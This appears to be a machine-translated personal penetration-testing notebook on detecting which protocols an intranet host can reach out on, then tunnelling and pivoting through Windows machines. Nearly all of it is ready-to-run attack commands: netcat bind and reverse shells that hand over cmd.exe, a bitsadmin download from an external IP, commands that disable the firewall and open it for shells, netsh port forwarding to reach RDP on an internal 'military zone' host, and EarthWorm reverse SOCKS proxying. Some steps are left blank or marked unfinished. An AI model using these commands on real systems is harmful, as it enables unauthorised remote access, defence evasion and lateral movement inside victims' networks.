1. Detect outgoing protocol of intranet server
windows system
1. icmp protocol out-net detection
Ping the IP address of your own vps
2. DNS protocol out-net detection
ping www.baidu.com
nslookup www.baidu.com
3. TCP out-net detection
telnet vps ip
2,nc
Attack aircraft: nc -lvvp 4444
Victim machine: nc vps-ip 4444
3,
bitsadmin /rawreturn /transfer down "http://120.79.66.58/1.gif" d:\1.txt
4,
powershell -exec bypass Import-Module .\telnet.ps1 Test-PortConnectivity -Source 'localhost' -RemoteDestination '192.168.3.69' -Port 110 -Iterate -protocol TCP
Second, build a protocol tunnel
1. Netsh port forwarding
Netsh is a tool that comes with windows to manage windows network configuration and firewall. The incoming tcp connection can be forwarded to
the port of the local or remote computer through netsh .
This tool can only be used with administrative rights.
Can view existing forwardingnetsh interface portproxy show all
Add a port mapping from IPV4 to IPV4 to netsh interface portproxy add v4tov4 listenport=22 connectaddress=ip connectport=port
delete the designated forwarding portnetsh interface portproxy delete v4tov4 listenport=port
netsh advfirewall show allprofiles View the firewall status of all network types in the current system
netsh advfirewall set allprofiles state off Turn off the current system firewall
netsh advfirewall set allprofiles state on Enable the current system firewall
Create a forward shell:
1. Add a firewall policy to allow external access to port 4444 through TCP protocol
rule name: the name of the rule (any name)
dir direction action (allow, prohibit) protocol: protocol localport: local port
netsh advfirewall firewall add rule name="nc in" dir=in action=allow protocol=TCP localport=4444
2. Upload netcat-win32-1.12.zip to the target machine, switch to the directory, and execute nc.exe -lvp 4444 -e cmd.exe
3. Execute nc64.exe -nv 192.168.206.129 4444 on the attacking machine to obtain a forward shell
Create a reverse shell:
Attack aircraft
1. Add a firewall policy to the attacker and open port 4443
netsh firewall add portopening TCP 4443 “nc reverse shell”
2. The attacker monitors port 4443 nc64.exe -lvp 4443
Target machine
3. Add a firewall policy to the target machine, allowing port 4443 to pass TCP protocol
netsh advfirewall firewall add rule name="nc reverse shell" dir=out action=allow protocol=TCP
localport=4443
4. Use the previously uploaded nc tool on the target machine to connect to port 4443 of the attacking machine
nc64.exe -nv 192.168.206.1 4443 -e cmd.exe
5. Get the shell of the target machine on the attacking machine
6. Although the link is successfully established, there is no response and the command cannot be executed
7. Through layer-by-layer investigation, it turns out that the victim machine is 64-bit, so nc64.exe should be used instead of nc.exe
8. The attacker got the victim's shell
You can see that the victim machine uses port 49169 to establish a link with port 4443 of the attack machine. ESTABLISHED (established) pid:2560
CLOSE_WAIT The other party actively closed the connection or the network is abnormal and the connection is interrupted
9.tasklist /svc | findstr "2560" found through pid is the connection established by nc64.exe
10, wmic process query detailed process information
Forward military zone server port
Boundary machine
1. Add a firewall policy to the border machine to allow port 8888 to connect
netsh advfirewall firewall add rule name="3389 test" dir=in action=allow protocol=TCP localport=8888
2. Add a firewall policy to forward the traffic of the attacker's access to port 8888 of the border machine to port 33389 of the host in the military zone
netsh interface portproxy add v4tov4 listenport=8888 connectaddress=192.168.52.129 connectport=3389
3. Check the forwarding rules
netsh interface portproxy show all
(Delete forwarding rules netsh interface portproxy delete v4tov4 listenport=8888)
4. Check whether the border machine is listening on port 8888
Attack aircraft
The operation that needs to be done on the attacking machine is very simple, the remote desktop login port 8888 of the border machine
Successfully logged in to the winserver 2003 server in the military zone
192.168.206.129 is the IP address of the boundary machine win7
iptables port forwarding
No
THAT ONE
Public IP test (not completed, try again every day)
(My vps is 64-bit, I searched for ew that thinks there is no 64-bit linux, very embarrassing)
1. View vps open ports
firewall-cmd --list-port
2. Open ports 6666 and 66667
firewall-cmd --zone=public --add-port=6666/tcp --permanent
firewall-cmd --zone=public --add-port=6667/tcp --permanent
3. Restart the firewall
4. Check whether it is successfully turned on
5. The vps monitors ports 6666 and 6667, the attacker machine accesses port 6666, and the target machine accesses port 6667.
./ew_linux_x64 -s rcsocks -l 6666 -e 6667 &
Rebound SOCKS v5 server
Attack aircraft: win7
Target machine: winserver2003
1. Monitor ports 1080 and 888 on the attacker
2. On the target machine
3. A connection has been established on the attacker
4. Use SocksCap6 for subsequent penetration